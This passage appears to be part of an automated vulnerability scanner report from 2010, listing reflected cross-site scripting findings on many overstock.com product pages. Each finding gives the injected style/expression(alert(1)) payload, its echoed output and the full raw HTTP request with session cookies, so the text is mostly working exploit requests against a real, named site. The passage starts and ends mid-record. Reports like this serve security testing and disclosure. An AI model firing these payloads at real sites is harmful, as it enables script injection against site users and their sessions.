GET /Crafts-Sewing/Brother-LX-3125-Sewing-Machine/4395190/product.html?9deef"style%3d"x%3aexpression(alert(1))"ea5e7c90a99=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.84. http://www.overstock.com/Crafts-Sewing/Brother-SE-350-Deluxe-Embroidery-Sewing-Machine-Refurbished/5088223/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3a38"style%3d"x%3aexpression(alert(1))"338037914d3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f3a38"style="x:expression(alert(1))"338037914d3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Crafts-Sewing/Brother-SE-350-Deluxe-Embroidery-Sewing-Machine-Refurbished/5088223/product.html?f3a38"style%3d"x%3aexpression(alert(1))"338037914d3=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.85. http://www.overstock.com/Crafts-Sewing/Brother-XR-7700-Computerized-Sewing-Machine-Refurbished/2677829/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e1ad"style%3d"x%3aexpression(alert(1))"a49a46f4b40 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4e1ad"style="x:expression(alert(1))"a49a46f4b40 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Crafts-Sewing/Brother-XR-7700-Computerized-Sewing-Machine-Refurbished/2677829/product.html?4e1ad"style%3d"x%3aexpression(alert(1))"a49a46f4b40=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.86. http://www.overstock.com/Crafts-Sewing/Brother-XR9000-120-stitch-Function-Computerized-Sewing-Machine-w-Alphabet-Font-Refurbished/4363751/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload efaab"style%3d"x%3aexpression(alert(1))"b871a7a300a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as efaab"style="x:expression(alert(1))"b871a7a300a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Crafts-Sewing/Brother-XR9000-120-stitch-Function-Computerized-Sewing-Machine-w-Alphabet-Font-Refurbished/4363751/product.html?efaab"style%3d"x%3aexpression(alert(1))"b871a7a300a=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.87. http://www.overstock.com/Crafts-Sewing/Cricut-Personal-Electronic-Cutter/2917502/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f8ae4"style%3d"x%3aexpression(alert(1))"5d2fb03e202 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f8ae4"style="x:expression(alert(1))"5d2fb03e202 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Crafts-Sewing/Cricut-Personal-Electronic-Cutter/2917502/product.html?f8ae4"style%3d"x%3aexpression(alert(1))"5d2fb03e202=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.88. http://www.overstock.com/Crafts-Sewing/Janome-Sew-Mini-Sewing-Machine-Refurbished/4395707/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bb044"style%3d"x%3aexpression(alert(1))"bb9f44acd4b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bb044"style="x:expression(alert(1))"bb9f44acd4b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Crafts-Sewing/Janome-Sew-Mini-Sewing-Machine-Refurbished/4395707/product.html?bb044"style%3d"x%3aexpression(alert(1))"bb9f44acd4b=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.89. http://www.overstock.com/Crafts-Sewing/Shark-Mini-Portable-Dress-Maker-Sewing-Machine/4124237/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bcafa"style%3d"x%3aexpression(alert(1))"f0fceb1f023 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bcafa"style="x:expression(alert(1))"f0fceb1f023 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Crafts-Sewing/Shark-Mini-Portable-Dress-Maker-Sewing-Machine/4124237/product.html?bcafa"style%3d"x%3aexpression(alert(1))"f0fceb1f023=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.90. http://www.overstock.com/Crafts-Sewing/Silhouette-SD-Digital-Craft-Cutter-with-10-Gift-Card/4400810/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8b09c"style%3d"x%3aexpression(alert(1))"053e4984f6d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8b09c"style="x:expression(alert(1))"053e4984f6d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Crafts-Sewing/Silhouette-SD-Digital-Craft-Cutter-with-10-Gift-Card/4400810/product.html?8b09c"style%3d"x%3aexpression(alert(1))"053e4984f6d=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.91. http://www.overstock.com/Crafts-Sewing/Singer-Hand-held-Sewing-Machine/3128187/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload db747"style%3d"x%3aexpression(alert(1))"fa26a77673c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as db747"style="x:expression(alert(1))"fa26a77673c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Crafts-Sewing/Singer-Hand-held-Sewing-Machine/3128187/product.html?db747"style%3d"x%3aexpression(alert(1))"fa26a77673c=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.92. http://www.overstock.com/Crafts-Sewing/Sizzix-Big-Shot-Machine-with-BONUS-Embossing-Folder/4094572/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 54724"style%3d"x%3aexpression(alert(1))"ad7d85b7c28 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 54724"style="x:expression(alert(1))"ad7d85b7c28 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Crafts-Sewing/Sizzix-Big-Shot-Machine-with-BONUS-Embossing-Folder/4094572/product.html?54724"style%3d"x%3aexpression(alert(1))"ad7d85b7c28=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.93. http://www.overstock.com/Electronics/50-foot-CAT5E-CAT5-Network-Ethernet-Cable/2541154/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b8c59"style%3d"x%3aexpression(alert(1))"b06869b35b8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b8c59"style="x:expression(alert(1))"b06869b35b8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Electronics/50-foot-CAT5E-CAT5-Network-Ethernet-Cable/2541154/product.html?b8c59"style%3d"x%3aexpression(alert(1))"b06869b35b8=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.94. http://www.overstock.com/Electronics/Black-6.5-foot-HDMI-HDMI-Cables-Set-of-2/2276116/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bc708"style%3d"x%3aexpression(alert(1))"e660e51f89c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bc708"style="x:expression(alert(1))"e660e51f89c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Electronics/Black-6.5-foot-HDMI-HDMI-Cables-Set-of-2/2276116/product.html?bc708"style%3d"x%3aexpression(alert(1))"e660e51f89c=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.95. http://www.overstock.com/Electronics/Eforcity-Black-2-port-USB-Car-Charger-w-LED-Light/4512322/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a0ec2"style%3d"x%3aexpression(alert(1))"fe49622d448 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a0ec2"style="x:expression(alert(1))"fe49622d448 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Electronics/Eforcity-Black-2-port-USB-Car-Charger-w-LED-Light/4512322/product.html?a0ec2"style%3d"x%3aexpression(alert(1))"fe49622d448=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.96. http://www.overstock.com/Electronics/Leather-Case-and-Protective-Kit-for-iPod-iTouch/4155506/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4266b"style%3d"x%3aexpression(alert(1))"26c79062f8c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4266b"style="x:expression(alert(1))"26c79062f8c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Electronics/Leather-Case-and-Protective-Kit-for-iPod-iTouch/4155506/product.html?4266b"style%3d"x%3aexpression(alert(1))"26c79062f8c=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.97. http://www.overstock.com/Electronics/Lithium-Coin-Battery-CR2032-Pack-of-5/3521764/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff271"style%3d"x%3aexpression(alert(1))"32c240f2498 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ff271"style="x:expression(alert(1))"32c240f2498 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
